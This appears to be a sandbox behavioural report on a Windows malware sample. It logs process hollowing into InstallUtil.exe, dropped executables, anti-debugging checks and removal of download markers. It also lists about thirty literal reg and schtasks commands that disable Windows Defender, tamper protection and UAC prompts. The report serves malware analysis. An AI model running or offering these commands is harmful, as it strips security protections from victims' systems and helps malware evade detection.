NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 124416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05590400 process_handle: 0xffffffff		3221225550
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05590178 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055901a0 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055901c8 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055901f0 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05590218 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 11 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af15e process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 11 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af152 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 72 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055aea00 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af16c process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af190 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af198 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af19c process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af1a4 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055af1a8 process_handle: 0xffffffff		3221225550

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\deffff.exe
file	C:\Users\test22\AppData\Local\Temp\puttty.exe
file	C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp\Disable Window Defender.bat

Creates a suspicious process (5 events)

cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\deffff.exe
file	C:\Users\test22\AppData\Local\Temp\puttty.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\deffff.exe
file	C:\Users\test22\AppData\Local\Temp\puttty.exe

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 28, 2021, 12:10 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 28, 2021, 12:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW March 28, 2021, 12:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (10 events)

description	Listen for incoming communication	rule	network_tcp_listen
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (32 events)

cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Communicates with host for which no DNS query was performed (3 events)

host	13.107.21.200
host	172.217.25.14
host	216.58.199.100

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 5540 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000244	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation March 28, 2021, 12:10 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

win230321.exe tried to sleep 8184512 seconds, actually delayed analysis time by 8184512 seconds

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\deffff.exe

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELRY`à¾4 @@ @d4W@ð` H.textÄ `.rsrcð@@@.reloc`@B base_address: 0x00400000 process_identifier: 5540 process_handle: 0x00000244	1	1
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: 8Ph @TøBôT4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°´StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.0@InternalName230321-load.exe(LegalCopyright HOriginalFilename230321-load.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="" publicKeyToken="6595b64144ccf1df" language="" /> </dependentAssembly> </dependency> </assembly> base_address: 0x00404000 process_identifier: 5540 process_handle: 0x00000244	1	1
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: 0À4 base_address: 0x00406000 process_identifier: 5540 process_handle: 0x00000244	1	1
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 5540 process_handle: 0x00000244	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELRY`à¾4 @@ @d4W@ð` H.textÄ `.rsrcð@@@.reloc`@B base_address: 0x00400000 process_identifier: 5540 process_handle: 0x00000244	1	1	0

Attempts to modify UAC prompt behavior (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 6240 called NtSetContextThread to modify thread in remote process 5540
NtSetContextThread March 28, 2021, 12:10 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4207806 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000240 process_identifier: 5540	1	0	0

Attempts to remove evidence of file being downloaded from the Internet (2 events)

file	C:\Users\test22\AppData\Local\Temp\InstallUtil.exe:Zone.Identifier
file	C:\Users\test22\AppData\Local\Temp\win230321.exe\:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 6240 resumed a thread in remote process 5540
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 5540	1	0	0

Creates known SpyNet files, registry changes and/or mutexes. (1 event)

registry

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet

Tries to unhook Windows functions monitored by Cuckoo (1 event)

Time & API	Arguments	Status	Return	Repeated
__anomaly__ March 28, 2021, 12:10 p.m.	tid: 5260 message: Encountered 65537 exceptions, quitting. subcategory: exception function_name:	1	0	0

Disables Windows Security features (13 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to disable windows defender	registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start

Executed a process and injected code into it, probably while unpacking (50 out of 65 events)

Time & API	Arguments	Status	Return
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x0000034c suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000610 suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x0000063c suspend_count: 1 process_identifier: 6240	1	0
NtGetContextThread March 28, 2021, 12:10 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread March 28, 2021, 12:10 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000658 suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x0000066c suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 6240	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 6240	1	0
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 8088 thread_handle: 0x00000240 process_identifier: 5540 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\InstallUtil.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\InstallUtil.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\InstallUtil.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000244	1	1
NtGetContextThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000240	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 5540 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000244	1	0
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELRY`à¾4 @@ @d4W@ð` H.textÄ `.rsrcð@@@.reloc`@B base_address: 0x00400000 process_identifier: 5540 process_handle: 0x00000244	1	1
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: base_address: 0x00402000 process_identifier: 5540 process_handle: 0x00000244	1	1
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: 8Ph @TøBôT4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°´StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.0@InternalName230321-load.exe(LegalCopyright HOriginalFilename230321-load.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="" publicKeyToken="6595b64144ccf1df" language="" /> </dependentAssembly> </dependency> </assembly> base_address: 0x00404000 process_identifier: 5540 process_handle: 0x00000244	1	1
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: 0À4 base_address: 0x00406000 process_identifier: 5540 process_handle: 0x00000244	1	1
WriteProcessMemory March 28, 2021, 12:10 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 5540 process_handle: 0x00000244	1	1
NtSetContextThread March 28, 2021, 12:10 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4207806 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000240 process_identifier: 5540	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 5540	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 5540	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 5540	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 5540	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 5540	1	0
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000388 suspend_count: 1 process_identifier: 5540	1	0
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 6200 thread_handle: 0x00000680 process_identifier: 8104 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\deffff.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\deffff.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\deffff.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000678	1	1
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x000004ac suspend_count: 1 process_identifier: 5540	1	0
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 5260 thread_handle: 0x000006a0 process_identifier: 8572 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\puttty.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\puttty.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\puttty.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000694	1	1
NtResumeThread March 28, 2021, 12:10 p.m.	thread_handle: 0x00000134 suspend_count: 1 process_identifier: 8104	1	0
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 6472 thread_handle: 0x00000290 process_identifier: 4496 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp\Disable Window Defender.bat" filepath_r: stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000284	1	1
CreateProcessInternalW March 28, 2021, 12:10 p.m.	thread_identifier: 4220 thread_handle: 0x00000088 process_identifier: 9168 current_directory: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
